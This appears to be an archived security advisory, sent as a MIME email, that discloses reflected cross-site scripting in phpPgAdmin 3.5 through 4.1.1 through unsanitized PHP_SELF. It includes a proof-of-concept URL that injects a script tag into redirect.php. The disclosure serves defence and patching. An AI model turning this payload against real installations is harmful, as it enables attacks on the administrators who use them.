phpPgAdmin versions 3.5 through 4.1.1 suffer from a cross site scripting vulnerability.
334636e8778c537c3d118de55e527517fd58cbc68e558f0146f81176e313ef1e
------=_Part_25754_4061665.1180272607070
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Synopsis: Multiple XSS Vulnerabilities
Introduction:
phpPgAdmin is a web-based administration tool for PostgreSQL.
Details:
phpPgAdmin doesn't correctly sanitize data in $_SERVER array and most of the
scripts make direct use of PHP_SELF.
PoC:
http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&server=test
This was tested on versions 3.5 to 4.1.1 as not logged user. Other versions
may also be vulnerable.
Regards Michal Majchrowicz.
Hack.pl
------=_Part_25754_4061665.1180272607070
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Synopsis: Multiple XSS Vulnerabilities<br><br>Introduction:<br>phpPgAdmin is a web-based administration tool for PostgreSQL.<br><br>Details:<br>phpPgAdmin doesn't correctly sanitize data in $_SERVER array and most of the scripts make direct use of PHP_SELF.
<br><br>PoC:<br><a href="http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&server=test">http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&server=test
</a><br>This was tested on versions 3.5 to 4.1.1 as not logged user. Other versions may also be vulnerable.<br><br>Regards Michal Majchrowicz.<br>Hack.pl<br>
------=_Part_25754_4061665.1180272607070--